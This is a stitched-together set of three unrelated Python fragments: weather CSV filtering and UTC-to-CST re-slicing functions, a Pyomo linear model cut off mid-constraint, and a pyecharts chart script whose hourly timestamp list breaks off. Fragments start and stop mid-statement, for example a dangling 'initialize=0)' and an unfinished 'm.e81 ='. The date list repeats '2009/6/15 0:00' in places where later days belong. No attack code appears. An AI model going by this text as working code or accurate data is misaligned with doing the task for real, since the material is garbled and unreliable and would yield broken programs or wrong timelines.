        for month in os.listdir(year_dir):
            month_dir = os.path.join(year_dir, month)
            if not os.path.isdir(month_dir):
                continue
            # source: aggregated data; destination: filtered output (rebuilt each run)
            src = os.path.join(month_dir, cstCsvFileName)
            dst = os.path.join(month_dir, "gidFilteredFile.csv")
            if os.path.exists(dst):
                os.remove(dst)
            filterOneFile(src, keep, dst)
            print("Filtered ", src, " added to ", dst)
def createSetOfGidFromFile(gidFileFullPath):
    """Read the static GID file (one gid per line after a header) into a set.

    BUG FIX: the original advanced the reader before adding, which skipped the
    first data row and added a spurious empty string '' at end of file.
    :param gidFileFullPath: path to the gid CSV (header + one gid per line)
    :return: set of gid strings
    """
    result = set()
    print("Creating set of GIDs used to filter in rows...")
    count = 0
    with open(gidFileFullPath, "r") as f:
        f.readline()  # skip header
        for line in f:
            # strip the trailing newline, keep everything else verbatim
            result.add(line.split('\n')[0])
            count += 1
            if count % 10000 == 0:
                print("Processed ", count, " rows...")
    print("Gid set created with ", count, " entries")
    return result
def filterOnGidDayLevel(opDirPath, gidFileFullPath, cstCsvFileName="cstAggregated.csv"):
    """Filter each day-level aggregated CSV to rows whose gid is in the static GID file."""
    keep = createSetOfGidFromFile(gidFileFullPath)
    for year in os.listdir(opDirPath):
        year_dir = os.path.join(opDirPath, year)
        if not os.path.isdir(year_dir):
            continue
        for month in os.listdir(year_dir):
            month_dir = os.path.join(year_dir, month)
            if not os.path.isdir(month_dir):
                continue
            for day in os.listdir(month_dir):
                day_dir = os.path.join(month_dir, day)
                if not os.path.isdir(day_dir):
                    continue
                # source: aggregated data; destination: filtered output (rebuilt each run)
                src = os.path.join(day_dir, cstCsvFileName)
                dst = os.path.join(day_dir, "gidFilteredFile.csv")
                if os.path.exists(dst):
                    os.remove(dst)
                filterOneFile(src, keep, dst)
                print("Filtered ", src, " added to ", dst)
def putLastDaySlice(lastCsvFile, utcCsvFile):
    """Append rows whose UTC and CST dates differ (previous CST day) to lastCsvFile.

    Columns 12/13 of each row are time_UTC / time_CST ('YYYY-MM-DDTHH:MM...').
    BUG FIX: the original advanced the reader before writing, so the row
    *after* each boundary row was copied instead of the boundary row itself.
    :param lastCsvFile: previous day's CST file (appended to)
    :param utcCsvFile: UTC-partitioned source CSV with a header row
    """
    lines = 0
    totalLines = 0
    with open(lastCsvFile, "a") as out, open(utcCsvFile, "r") as src:
        src.readline()  # skip header
        for line in src:
            rowData = line.split(sep=',')
            utcTime = rowData[12]
            cstTime = rowData[13]
            if utcTime.split('T')[0] != cstTime.split('T')[0]:
                out.write(line)
                lines = lines + 1
                totalLines = totalLines + 1
                if lines >= 100000:
                    print("Processed ", lines, " from ",
                          utcCsvFile, " total lines ", totalLines)
                    lines = 0
def putCurrentDaySlice(cstCsvFile, utcCsvFile):
    """Append rows whose UTC and CST dates match (the current CST day) to cstCsvFile.

    Columns 12/13 of each row are time_UTC / time_CST ('YYYY-MM-DDTHH:MM...').
    """
    since_report = 0
    total = 0
    with open(cstCsvFile, "a") as out, open(utcCsvFile, "r") as src:
        src.readline()  # skip header
        for line in src:
            fields = line.split(sep=',')
            # keep the row only when the UTC and CST calendar dates agree
            if fields[12].split('T')[0] == fields[13].split('T')[0]:
                out.write(line)
                since_report += 1
                total += 1
                if since_report >= 100000:
                    print("Processed ", since_report, " from ",
                          utcCsvFile, " total lines ", total)
                    since_report = 0
def redistributeCsvFilesForCstDay(opDirPath,
                                  removeExistingCsv=False,
                                  utcCsvFileName="aggregated.csv",
                                  cstCsvFileName="cstAggregated.csv"):
    """Walk year/month/day folders and re-slice UTC-partitioned CSVs onto CST days.

    Rows belonging to the previous CST day are appended to the prior day's
    file; same-day rows go to the current day's file.
    NOTE(review): removeExistingCsv is currently unused.
    """
    previous_cst_file = None
    for year in os.listdir(opDirPath):
        year_dir = os.path.join(opDirPath, year)
        if not os.path.isdir(year_dir):
            continue
        for month in os.listdir(year_dir):
            month_dir = os.path.join(year_dir, month)
            if not os.path.isdir(month_dir):
                continue
            for day in os.listdir(month_dir):
                day_dir = os.path.join(month_dir, day)
                if not os.path.isdir(day_dir):
                    continue
                utc_file = os.path.join(day_dir, utcCsvFileName)
                cst_file = os.path.join(day_dir, cstCsvFileName)
                # create the CST file with its header on first touch
                if not os.path.exists(cst_file):
                    with open(cst_file, "w") as out:
                        out.write(
                            "gid, tmpc, wawa, ptype, dwpc, smps, drct, vsby, roadtmpc, srad, snwd, pcpn, time_UTC, time_CST\n")
                if previous_cst_file is not None:
                    putLastDaySlice(previous_cst_file, utc_file)
                    print("Done copying out previous day CST to ", previous_cst_file, " from ",
                          utc_file)
                putCurrentDaySlice(cst_file, utc_file)
                print("Done copying out current day CST to ", cst_file, " from ",
                      utc_file)
                previous_cst_file = cst_file
def redistributeCsvFilesForCstMonth(opDirPath,
                                    removeExistingCsv=False,
                                    utcCsvFileName="aggregated.csv",
                                    cstCsvFileName="cstAggregated.csv"):
    """
    Walks each year/month output folder and re-slices the UTC-partitioned
    aggregated CSV onto CST month boundaries: rows whose CST date differs from
    their UTC date are appended to the previous month's CST file.

    :param opDirPath: root of the output directory tree (year/month subfolders)
    :param removeExistingCsv: currently unused
    :param utcCsvFileName: name of the UTC-partitioned source CSV per folder
    :param cstCsvFileName: name of the CST-partitioned destination CSV per folder
    """
    # tracks the previous month's CST file so boundary rows land there
    lastCsvFile = None
    for year in os.listdir(opDirPath):
        if not os.path.isdir(os.path.join(opDirPath, year)):
            continue
        for month in os.listdir(os.path.join(opDirPath, year)):
            if not os.path.isdir(os.path.join(opDirPath, year, month)):
                continue
            # File that contains aggregated data
            utcCsvFile = os.path.join(opDirPath, year, month, utcCsvFileName)
            cstCsvFile = os.path.join(opDirPath, year, month, cstCsvFileName)
            # for day in os.listdir(os.path.join(opDirPath, year, month)):
            #     if not os.path.isdir(os.path.join(opDirPath, year, month, day)):
            #         continue
            # create the CST file with its header on first touch
            if not os.path.exists(cstCsvFile):
                with open(cstCsvFile, "w") as f:
                    f.write(
                        "gid, tmpc, wawa, ptype, dwpc, smps, drct, vsby, roadtmpc, srad, snwd, pcpn, time_UTC, "
                        "time_CST\n")
                f.close()
            if lastCsvFile is not None:
                putLastDaySlice(lastCsvFile, utcCsvFile)
                print("Done copying out previous day CST to ", lastCsvFile, " from ",
                      utcCsvFile)
            # NOTE(review): unlike redistributeCsvFilesForCstDay there is no
            # putCurrentDaySlice call or lastCsvFile update here — confirm
            # whether this function is truncated or the current-month copy
            # happens elsewhere.
| |
initialize=0)
# Decision variables x942..x1060: continuous, bounded to [0, 10], initialized
# at 0. Generated in a loop instead of 119 identical assignments; setattr on
# the model routes through the same component-assignment path as m.xN = Var().
for _var_index in range(942, 1061):
    setattr(m, 'x%d' % _var_index, Var(within=Reals, bounds=(0, 10), initialize=0))
m.obj = Objective(sense=minimize, expr= m.x203 + m.x206 + m.x209 + m.x212 +
m.x214 + m.x216 + m.x218 + m.x220 + m.x222 + m.x224 + m.x226 + m.x228 +
m.x230 + m.x232 + m.x234 + m.x236 + m.x237 + m.x238 + m.x239 + m.x240 +
m.x241 + m.x242 + m.x243 + m.x244 + m.x245 + m.x246 + m.x247 + m.x248 +
m.x249 + m.x250 + m.x251 + m.x252 + m.x253 + m.x254 + m.x255 + m.x256 +
m.x257 + m.x258 + m.x259 + m.x260)
m.e1 = Constraint(expr= m.x201 - m.x202 - m.x203 <= 0)
m.e2 = Constraint(expr= -m.x201 + m.x202 - m.x203 <= 0)
m.e3 = Constraint(expr= m.x204 - m.x205 - m.x206 <= 0)
m.e4 = Constraint(expr= -m.x204 + m.x205 - m.x206 <= 0)
m.e5 = Constraint(expr= m.x207 - m.x208 - m.x209 <= 0)
m.e6 = Constraint(expr= -m.x207 + m.x208 - m.x209 <= 0)
m.e7 = Constraint(expr= m.x210 - m.x211 - m.x212 <= 0)
m.e8 = Constraint(expr= -m.x210 + m.x211 - m.x212 <= 0)
m.e9 = Constraint(expr= m.x201 - m.x213 - m.x214 <= 0)
m.e10 = Constraint(expr= -m.x201 + m.x213 - m.x214 <= 0)
m.e11 = Constraint(expr= m.x204 - m.x215 - m.x216 <= 0)
m.e12 = Constraint(expr= -m.x204 + m.x215 - m.x216 <= 0)
m.e13 = Constraint(expr= m.x207 - m.x217 - m.x218 <= 0)
m.e14 = Constraint(expr= -m.x207 + m.x217 - m.x218 <= 0)
m.e15 = Constraint(expr= m.x210 - m.x219 - m.x220 <= 0)
m.e16 = Constraint(expr= -m.x210 + m.x219 - m.x220 <= 0)
m.e17 = Constraint(expr= m.x201 - m.x221 - m.x222 <= 0)
m.e18 = Constraint(expr= -m.x201 + m.x221 - m.x222 <= 0)
m.e19 = Constraint(expr= m.x204 - m.x223 - m.x224 <= 0)
m.e20 = Constraint(expr= -m.x204 + m.x223 - m.x224 <= 0)
m.e21 = Constraint(expr= m.x207 - m.x225 - m.x226 <= 0)
m.e22 = Constraint(expr= -m.x207 + m.x225 - m.x226 <= 0)
m.e23 = Constraint(expr= m.x210 - m.x227 - m.x228 <= 0)
m.e24 = Constraint(expr= -m.x210 + m.x227 - m.x228 <= 0)
m.e25 = Constraint(expr= m.x201 - m.x229 - m.x230 <= 0)
m.e26 = Constraint(expr= -m.x201 + m.x229 - m.x230 <= 0)
m.e27 = Constraint(expr= m.x204 - m.x231 - m.x232 <= 0)
m.e28 = Constraint(expr= -m.x204 + m.x231 - m.x232 <= 0)
m.e29 = Constraint(expr= m.x207 - m.x233 - m.x234 <= 0)
m.e30 = Constraint(expr= -m.x207 + m.x233 - m.x234 <= 0)
m.e31 = Constraint(expr= m.x210 - m.x235 - m.x236 <= 0)
m.e32 = Constraint(expr= -m.x210 + m.x235 - m.x236 <= 0)
m.e33 = Constraint(expr= m.x202 - m.x213 - m.x237 <= 0)
m.e34 = Constraint(expr= -m.x202 + m.x213 - m.x237 <= 0)
m.e35 = Constraint(expr= m.x205 - m.x215 - m.x238 <= 0)
m.e36 = Constraint(expr= -m.x205 + m.x215 - m.x238 <= 0)
m.e37 = Constraint(expr= m.x208 - m.x217 - m.x239 <= 0)
m.e38 = Constraint(expr= -m.x208 + m.x217 - m.x239 <= 0)
m.e39 = Constraint(expr= m.x211 - m.x219 - m.x240 <= 0)
m.e40 = Constraint(expr= -m.x211 + m.x219 - m.x240 <= 0)
m.e41 = Constraint(expr= m.x202 - m.x221 - m.x241 <= 0)
m.e42 = Constraint(expr= -m.x202 + m.x221 - m.x241 <= 0)
m.e43 = Constraint(expr= m.x205 - m.x223 - m.x242 <= 0)
m.e44 = Constraint(expr= -m.x205 + m.x223 - m.x242 <= 0)
m.e45 = Constraint(expr= m.x208 - m.x225 - m.x243 <= 0)
m.e46 = Constraint(expr= -m.x208 + m.x225 - m.x243 <= 0)
m.e47 = Constraint(expr= m.x211 - m.x227 - m.x244 <= 0)
m.e48 = Constraint(expr= -m.x211 + m.x227 - m.x244 <= 0)
m.e49 = Constraint(expr= m.x202 - m.x229 - m.x245 <= 0)
m.e50 = Constraint(expr= -m.x202 + m.x229 - m.x245 <= 0)
m.e51 = Constraint(expr= m.x205 - m.x231 - m.x246 <= 0)
m.e52 = Constraint(expr= -m.x205 + m.x231 - m.x246 <= 0)
m.e53 = Constraint(expr= m.x208 - m.x233 - m.x247 <= 0)
m.e54 = Constraint(expr= -m.x208 + m.x233 - m.x247 <= 0)
m.e55 = Constraint(expr= m.x211 - m.x235 - m.x248 <= 0)
m.e56 = Constraint(expr= -m.x211 + m.x235 - m.x248 <= 0)
m.e57 = Constraint(expr= m.x213 - m.x221 - m.x249 <= 0)
m.e58 = Constraint(expr= -m.x213 + m.x221 - m.x249 <= 0)
m.e59 = Constraint(expr= m.x215 - m.x223 - m.x250 <= 0)
m.e60 = Constraint(expr= -m.x215 + m.x223 - m.x250 <= 0)
m.e61 = Constraint(expr= m.x217 - m.x225 - m.x251 <= 0)
m.e62 = Constraint(expr= -m.x217 + m.x225 - m.x251 <= 0)
m.e63 = Constraint(expr= m.x219 - m.x227 - m.x252 <= 0)
m.e64 = Constraint(expr= -m.x219 + m.x227 - m.x252 <= 0)
m.e65 = Constraint(expr= m.x213 - m.x229 - m.x253 <= 0)
m.e66 = Constraint(expr= -m.x213 + m.x229 - m.x253 <= 0)
m.e67 = Constraint(expr= m.x215 - m.x231 - m.x254 <= 0)
m.e68 = Constraint(expr= -m.x215 + m.x231 - m.x254 <= 0)
m.e69 = Constraint(expr= m.x217 - m.x233 - m.x255 <= 0)
m.e70 = Constraint(expr= -m.x217 + m.x233 - m.x255 <= 0)
m.e71 = Constraint(expr= m.x219 - m.x235 - m.x256 <= 0)
m.e72 = Constraint(expr= -m.x219 + m.x235 - m.x256 <= 0)
m.e73 = Constraint(expr= m.x221 - m.x229 - m.x257 <= 0)
m.e74 = Constraint(expr= -m.x221 + m.x229 - m.x257 <= 0)
m.e75 = Constraint(expr= m.x223 - m.x231 - m.x258 <= 0)
m.e76 = Constraint(expr= -m.x223 + m.x231 - m.x258 <= 0)
m.e77 = Constraint(expr= m.x225 - m.x233 - m.x259 <= 0)
m.e78 = Constraint(expr= -m.x225 + m.x233 - m.x259 <= 0)
m.e79 = Constraint(expr= m.x227 - m.x235 - m.x260 <= 0)
m.e80 = Constraint(expr= -m.x227 + m.x235 - m.x260 <= 0)
m.e81 = | |
import pyecharts.options as opts
from pyecharts.charts import Line, Grid
"""
From Echarts Gallery: https://www.echartsjs.com/examples/zh/editor.html?c=grid-multiple
"""
timeData = [
"2009/6/12 2:00",
"2009/6/12 3:00",
"2009/6/12 4:00",
"2009/6/12 5:00",
"2009/6/12 6:00",
"2009/6/12 7:00",
"2009/6/12 8:00",
"2009/6/12 9:00",
"2009/6/12 10:00",
"2009/6/12 11:00",
"2009/6/12 12:00",
"2009/6/12 13:00",
"2009/6/12 14:00",
"2009/6/12 15:00",
"2009/6/12 16:00",
"2009/6/12 17:00",
"2009/6/12 18:00",
"2009/6/12 19:00",
"2009/6/12 20:00",
"2009/6/12 21:00",
"2009/6/12 22:00",
"2009/6/12 23:00",
"2009/6/13 0:00",
"2009/6/13 1:00",
"2009/6/13 2:00",
"2009/6/13 3:00",
"2009/6/13 4:00",
"2009/6/13 5:00",
"2009/6/13 6:00",
"2009/6/13 7:00",
"2009/6/13 8:00",
"2009/6/13 9:00",
"2009/6/13 10:00",
"2009/6/13 11:00",
"2009/6/13 12:00",
"2009/6/13 13:00",
"2009/6/13 14:00",
"2009/6/13 15:00",
"2009/6/13 16:00",
"2009/6/13 17:00",
"2009/6/13 18:00",
"2009/6/13 19:00",
"2009/6/13 20:00",
"2009/6/13 21:00",
"2009/6/13 22:00",
"2009/6/13 23:00",
"2009/6/14 0:00",
"2009/6/14 1:00",
"2009/6/14 2:00",
"2009/6/14 3:00",
"2009/6/14 4:00",
"2009/6/14 5:00",
"2009/6/14 6:00",
"2009/6/14 7:00",
"2009/6/14 8:00",
"2009/6/14 9:00",
"2009/6/14 10:00",
"2009/6/14 11:00",
"2009/6/14 12:00",
"2009/6/14 13:00",
"2009/6/14 14:00",
"2009/6/14 15:00",
"2009/6/14 16:00",
"2009/6/14 17:00",
"2009/6/14 18:00",
"2009/6/14 19:00",
"2009/6/14 20:00",
"2009/6/14 21:00",
"2009/6/14 22:00",
"2009/6/14 23:00",
"2009/6/15 0:00",
"2009/6/15 1:00",
"2009/6/15 2:00",
"2009/6/15 3:00",
"2009/6/15 4:00",
"2009/6/15 5:00",
"2009/6/15 6:00",
"2009/6/15 7:00",
"2009/6/15 8:00",
"2009/6/15 9:00",
"2009/6/15 10:00",
"2009/6/15 11:00",
"2009/6/15 12:00",
"2009/6/15 13:00",
"2009/6/15 14:00",
"2009/6/15 15:00",
"2009/6/15 16:00",
"2009/6/15 17:00",
"2009/6/15 18:00",
"2009/6/15 19:00",
"2009/6/15 20:00",
"2009/6/15 21:00",
"2009/6/15 22:00",
"2009/6/15 23:00",
"2009/6/15 0:00",
"2009/6/16 1:00",
"2009/6/16 2:00",
"2009/6/16 3:00",
"2009/6/16 4:00",
"2009/6/16 5:00",
"2009/6/16 6:00",
"2009/6/16 7:00",
"2009/6/16 8:00",
"2009/6/16 9:00",
"2009/6/16 10:00",
"2009/6/16 11:00",
"2009/6/16 12:00",
"2009/6/16 13:00",
"2009/6/16 14:00",
"2009/6/16 15:00",
"2009/6/16 16:00",
"2009/6/16 17:00",
"2009/6/16 18:00",
"2009/6/16 19:00",
"2009/6/16 20:00",
"2009/6/16 21:00",
"2009/6/16 22:00",
"2009/6/16 23:00",
"2009/6/15 0:00",
"2009/6/17 1:00",
"2009/6/17 2:00",
"2009/6/17 3:00",
"2009/6/17 4:00",
"2009/6/17 5:00",
"2009/6/17 6:00",
"2009/6/17 7:00",
"2009/6/17 8:00",
"2009/6/17 9:00",
"2009/6/17 10:00",
"2009/6/17 11:00",
"2009/6/17 12:00",
"2009/6/17 13:00",
"2009/6/17 14:00",
"2009/6/17 15:00",
"2009/6/17 16:00",
"2009/6/17 17:00",
"2009/6/17 18:00",
"2009/6/17 19:00",
"2009/6/17 20:00",
"2009/6/17 21:00",
"2009/6/17 22:00",
"2009/6/17 23:00",
"2009/6/18 0:00",
"2009/6/18 1:00",
"2009/6/18 2:00",
"2009/6/18 3:00",
"2009/6/18 4:00",
"2009/6/18 5:00",
"2009/6/18 6:00",
"2009/6/18 7:00",
"2009/6/18 8:00",
"2009/6/18 9:00",
"2009/6/18 10:00",
"2009/6/18 11:00",
"2009/6/18 12:00",
"2009/6/18 13:00",
"2009/6/18 14:00",
"2009/6/18 15:00",
"2009/6/18 16:00",
"2009/6/18 17:00",
"2009/6/18 18:00",
"2009/6/18 19:00",
"2009/6/18 20:00",
"2009/6/18 21:00",
"2009/6/18 22:00",
"2009/6/18 23:00",
"2009/6/15 0:00",
"2009/6/19 1:00",
"2009/6/19 2:00",
"2009/6/19 3:00",
"2009/6/19 4:00",
"2009/6/19 5:00",
"2009/6/19 6:00",
"2009/6/19 7:00",
"2009/6/19 8:00",
"2009/6/19 9:00",
"2009/6/19 10:00",
"2009/6/19 11:00",
"2009/6/19 12:00",
"2009/6/19 13:00",
"2009/6/19 14:00",
"2009/6/19 15:00",
"2009/6/19 16:00",
"2009/6/19 17:00",
"2009/6/19 18:00",
"2009/6/19 19:00",
"2009/6/19 20:00",
"2009/6/19 21:00",
"2009/6/19 22:00",
"2009/6/19 23:00",
"2009/6/20 0:00",
"2009/6/20 1:00",
"2009/6/20 2:00",
"2009/6/20 3:00",
"2009/6/20 4:00",
"2009/6/20 5:00",
"2009/6/20 6:00",
"2009/6/20 7:00",
"2009/6/20 8:00",
"2009/6/20 9:00",
"2009/6/20 10:00",
"2009/6/20 11:00",
"2009/6/20 12:00",
"2009/6/20 13:00",
"2009/6/20 14:00",
"2009/6/20 15:00",
"2009/6/20 16:00",
"2009/6/20 17:00",
"2009/6/20 18:00",
"2009/6/20 19:00",
"2009/6/20 20:00",
"2009/6/20 21:00",
"2009/6/20 22:00",
"2009/6/20 23:00",
"2009/6/21 0:00",
"2009/6/21 1:00",
"2009/6/21 2:00",
"2009/6/21 3:00",
"2009/6/21 4:00",
"2009/6/21 5:00",
"2009/6/21 6:00",
"2009/6/21 7:00",
"2009/6/21 8:00",
"2009/6/21 9:00",
"2009/6/21 10:00",
"2009/6/21 11:00",
"2009/6/21 12:00",
"2009/6/21 13:00",
"2009/6/21 14:00",
"2009/6/21 15:00",
"2009/6/21 16:00",
"2009/6/21 17:00",
"2009/6/21 18:00",
"2009/6/21 19:00",
"2009/6/21 20:00",
"2009/6/21 21:00",
"2009/6/21 22:00",
"2009/6/21 23:00",
"2009/6/22 0:00",
"2009/6/22 1:00",
"2009/6/22 2:00",
"2009/6/22 3:00",
"2009/6/22 4:00",
"2009/6/22 5:00",
"2009/6/22 6:00",
"2009/6/22 7:00",
"2009/6/22 8:00",
"2009/6/22 9:00",
"2009/6/22 10:00",
"2009/6/22 11:00",
"2009/6/22 12:00",
"2009/6/22 13:00",
"2009/6/22 14:00",
"2009/6/22 15:00",
"2009/6/22 16:00",
"2009/6/22 17:00",
"2009/6/22 18:00",
"2009/6/22 19:00",
"2009/6/22 20:00",
"2009/6/22 21:00",
"2009/6/22 22:00",
"2009/6/22 23:00",
"2009/6/23 0:00",
"2009/6/23 1:00",
"2009/6/23 2:00",
"2009/6/23 3:00",
"2009/6/23 4:00",
"2009/6/23 5:00",
"2009/6/23 6:00",
"2009/6/23 7:00",
"2009/6/23 8:00",
"2009/6/23 9:00",
"2009/6/23 10:00",
"2009/6/23 11:00",
"2009/6/23 12:00",
"2009/6/23 13:00",
"2009/6/23 14:00",
"2009/6/23 15:00",
"2009/6/23 16:00",
"2009/6/23 17:00",
"2009/6/23 18:00",
"2009/6/23 19:00",
"2009/6/23 20:00",
"2009/6/23 21:00",
"2009/6/23 22:00",
"2009/6/23 23:00",
"2009/6/24 0:00",
"2009/6/24 1:00",
"2009/6/24 2:00",
"2009/6/24 3:00",
"2009/6/24 4:00",
"2009/6/24 5:00",
"2009/6/24 6:00",
"2009/6/24 7:00",
"2009/6/24 8:00",
"2009/6/24 9:00",
"2009/6/24 10:00",
"2009/6/24 11:00",
"2009/6/24 12:00",
"2009/6/24 13:00",
"2009/6/24 14:00",
"2009/6/24 15:00",
"2009/6/24 16:00",
"2009/6/24 17:00",
"2009/6/24 18:00",
"2009/6/24 19:00",
"2009/6/24 20:00",
"2009/6/24 21:00",
"2009/6/24 22:00",
"2009/6/24 23:00",
"2009/6/25 0:00",
"2009/6/25 1:00",
"2009/6/25 2:00",
"2009/6/25 3:00",
"2009/6/25 4:00",
"2009/6/25 5:00",
"2009/6/25 6:00",
"2009/6/25 7:00",
"2009/6/25 8:00",
"2009/6/25 9:00",
"2009/6/25 10:00",
"2009/6/25 11:00",
"2009/6/25 12:00",
"2009/6/25 13:00",
"2009/6/25 14:00",
"2009/6/25 15:00",
"2009/6/25 16:00",
"2009/6/25 17:00",
"2009/6/25 18:00",
"2009/6/25 19:00",
"2009/6/25 20:00",
"2009/6/25 21:00",
"2009/6/25 22:00",
"2009/6/25 23:00",
"2009/6/26 0:00",
"2009/6/26 1:00",
"2009/6/26 2:00",
"2009/6/26 3:00",
"2009/6/26 4:00",
"2009/6/26 5:00",
"2009/6/26 6:00",
"2009/6/26 7:00",
"2009/6/26 8:00",
"2009/6/26 9:00",
"2009/6/26 10:00",
"2009/6/26 11:00",
"2009/6/26 12:00",
"2009/6/26 13:00",
"2009/6/26 14:00",
"2009/6/26 15:00",
"2009/6/26 16:00",
"2009/6/26 17:00",
"2009/6/26 18:00",
"2009/6/26 19:00",
"2009/6/26 20:00",
"2009/6/26 21:00",
"2009/6/26 22:00",
"2009/6/26 23:00",
"2009/6/27 0:00",
"2009/6/27 1:00",
"2009/6/27 2:00",
"2009/6/27 3:00",
"2009/6/27 4:00",
"2009/6/27 5:00",
"2009/6/27 6:00",
"2009/6/27 7:00",
"2009/6/27 8:00",
"2009/6/27 9:00",
"2009/6/27 10:00",
"2009/6/27 11:00",
"2009/6/27 12:00",
"2009/6/27 13:00",
"2009/6/27 14:00",
"2009/6/27 15:00",
"2009/6/27 16:00",
"2009/6/27 17:00",
"2009/6/27 18:00",
"2009/6/27 19:00",
"2009/6/27 20:00",
"2009/6/27 21:00",
"2009/6/27 22:00",
"2009/6/27 23:00",
"2009/6/28 0:00",
"2009/6/28 1:00",
"2009/6/28 2:00",
"2009/6/28 3:00",
"2009/6/28 4:00",
"2009/6/28 5:00",
"2009/6/28 6:00",
"2009/6/28 7:00",
"2009/6/28 8:00",
"2009/6/28 9:00",
"2009/6/28 10:00",
"2009/6/28 11:00",
"2009/6/28 12:00",
"2009/6/28 13:00",
"2009/6/28 14:00",
"2009/6/28 15:00",
"2009/6/28 16:00",
"2009/6/28 17:00",
"2009/6/28 18:00",
"2009/6/28 19:00",
"2009/6/28 20:00",
"2009/6/28 21:00",
"2009/6/28 22:00",
"2009/6/28 23:00",
"2009/6/29 0:00",
"2009/6/29 1:00",
"2009/6/29 2:00",
"2009/6/29 3:00",
"2009/6/29 4:00",
"2009/6/29 5:00",
"2009/6/29 6:00",
"2009/6/29 7:00",
"2009/6/29 8:00",
"2009/6/29 9:00",
"2009/6/29 10:00",
"2009/6/29 11:00",
"2009/6/29 12:00",
"2009/6/29 13:00",
"2009/6/29 14:00",
"2009/6/29 15:00",
"2009/6/29 16:00",
"2009/6/29 17:00",
"2009/6/29 18:00",
"2009/6/29 19:00",
"2009/6/29 20:00",
"2009/6/29 21:00",
"2009/6/29 22:00",
"2009/6/29 23:00",
"2009/6/30 0:00",
"2009/6/30 1:00",
"2009/6/30 2:00",
"2009/6/30 3:00",
"2009/6/30 4:00",
"2009/6/30 5:00",
"2009/6/30 6:00",
"2009/6/30 7:00",
"2009/6/30 8:00",
"2009/6/30 9:00",
"2009/6/30 10:00",
"2009/6/30 11:00",
"2009/6/30 12:00",
"2009/6/30 13:00",
"2009/6/30 14:00",
"2009/6/30 15:00",
"2009/6/30 16:00",
"2009/6/30 17:00",
"2009/6/30 18:00",
"2009/6/30 19:00",
"2009/6/30 20:00",
"2009/6/30 21:00",
"2009/6/30 22:00",
"2009/6/30 23:00",
"2009/7/1 0:00",
"2009/7/1 1:00",
"2009/7/1 2:00",
"2009/7/1 3:00",
"2009/7/1 4:00",
"2009/7/1 5:00",
"2009/7/1 6:00",
"2009/7/1 7:00",
"2009/7/1 8:00",
"2009/7/1 9:00",
"2009/7/1 10:00",
"2009/7/1 11:00",
"2009/7/1 12:00",
"2009/7/1 13:00",
"2009/7/1 14:00",
"2009/7/1 15:00",
"2009/7/1 16:00",
"2009/7/1 17:00",
"2009/7/1 18:00",
"2009/7/1 19:00",
"2009/7/1 20:00",
"2009/7/1 21:00",
"2009/7/1 22:00",
"2009/7/1 23:00",
"2009/7/2 0:00",
"2009/7/2 1:00",
"2009/7/2 2:00",
"2009/7/2 3:00",
"2009/7/2 4:00",
"2009/7/2 5:00",
"2009/7/2 6:00",
"2009/7/2 7:00",
"2009/7/2 8:00",
"2009/7/2 9:00",
"2009/7/2 10:00",
"2009/7/2 11:00",
"2009/7/2 12:00",
"2009/7/2 13:00",
"2009/7/2 14:00",
"2009/7/2 15:00",
"2009/7/2 16:00",
"2009/7/2 17:00",
"2009/7/2 18:00",
"2009/7/2 19:00",
"2009/7/2 20:00",
"2009/7/2 21:00",
"2009/7/2 22:00",
"2009/7/2 23:00",
"2009/7/3 0:00",
"2009/7/3 1:00",
"2009/7/3 2:00",
"2009/7/3 3:00",
"2009/7/3 4:00",
"2009/7/3 5:00",
"2009/7/3 6:00",
"2009/7/3 7:00",
"2009/7/3 8:00",
"2009/7/3 9:00",
"2009/7/3 10:00",
"2009/7/3 11:00",
"2009/7/3 12:00",
"2009/7/3 13:00",
"2009/7/3 14:00",
"2009/7/3 15:00",
"2009/7/3 16:00",
"2009/7/3 17:00",
"2009/7/3 18:00",
"2009/7/3 19:00",
"2009/7/3 20:00",
"2009/7/3 21:00",
"2009/7/3 22:00",
"2009/7/3 23:00",
"2009/7/4 0:00",
"2009/7/4 1:00",
"2009/7/4 2:00",
"2009/7/4 3:00",
"2009/7/4 4:00",
"2009/7/4 5:00",
"2009/7/4 6:00",
"2009/7/4 7:00",
"2009/7/4 8:00",
"2009/7/4 9:00",
"2009/7/4 10:00",
"2009/7/4 11:00",
"2009/7/4 12:00",
"2009/7/4 13:00",
"2009/7/4 14:00",
"2009/7/4 15:00",
"2009/7/4 16:00",
"2009/7/4 17:00",
"2009/7/4 18:00",
"2009/7/4 19:00",
"2009/7/4 20:00",
"2009/7/4 21:00",
"2009/7/4 22:00",
"2009/7/4 23:00",
"2009/7/5 0:00",
"2009/7/5 1:00",
"2009/7/5 2:00",
"2009/7/5 3:00",
"2009/7/5 4:00",
"2009/7/5 5:00",
"2009/7/5 6:00",
"2009/7/5 7:00",
"2009/7/5 8:00",
"2009/7/5 9:00",
"2009/7/5 10:00",
"2009/7/5 11:00",
"2009/7/5 12:00",
"2009/7/5 13:00",
"2009/7/5 14:00",
"2009/7/5 15:00",
"2009/7/5 16:00",
"2009/7/5 17:00",
"2009/7/5 18:00",
"2009/7/5 19:00",
"2009/7/5 20:00",
"2009/7/5 21:00",
"2009/7/5 22:00",
"2009/7/5 23:00",
"2009/7/6 0:00",
"2009/7/6 1:00",
"2009/7/6 2:00",
"2009/7/6 3:00",
"2009/7/6 4:00",
"2009/7/6 5:00",
"2009/7/6 6:00",
"2009/7/6 7:00",
"2009/7/6 8:00",
"2009/7/6 9:00",
"2009/7/6 10:00",
"2009/7/6 11:00",
"2009/7/6 12:00",
"2009/7/6 13:00",
"2009/7/6 14:00",
"2009/7/6 15:00",
"2009/7/6 16:00",
"2009/7/6 17:00",
"2009/7/6 18:00",
"2009/7/6 19:00",
"2009/7/6 20:00",
"2009/7/6 21:00",
"2009/7/6 22:00",
"2009/7/6 23:00",
"2009/7/7 0:00",
"2009/7/7 1:00",
"2009/7/7 2:00",
"2009/7/7 3:00",
"2009/7/7 4:00",
"2009/7/7 5:00",
"2009/7/7 6:00",
"2009/7/7 7:00",
"2009/7/7 8:00",
"2009/7/7 9:00",
"2009/7/7 10:00",
"2009/7/7 11:00",
"2009/7/7 12:00",
"2009/7/7 13:00",
"2009/7/7 14:00",
"2009/7/7 15:00",
"2009/7/7 16:00",
"2009/7/7 17:00",
"2009/7/7 18:00",
"2009/7/7 19:00",
"2009/7/7 20:00",
"2009/7/7 21:00",
"2009/7/7 22:00",
"2009/7/7 23:00",
"2009/7/8 0:00",
"2009/7/8 1:00",
"2009/7/8 2:00",
"2009/7/8 3:00",
"2009/7/8 4:00",
"2009/7/8 5:00",
"2009/7/8 6:00",
"2009/7/8 7:00",
"2009/7/8 8:00",
"2009/7/8 9:00",
"2009/7/8 10:00",
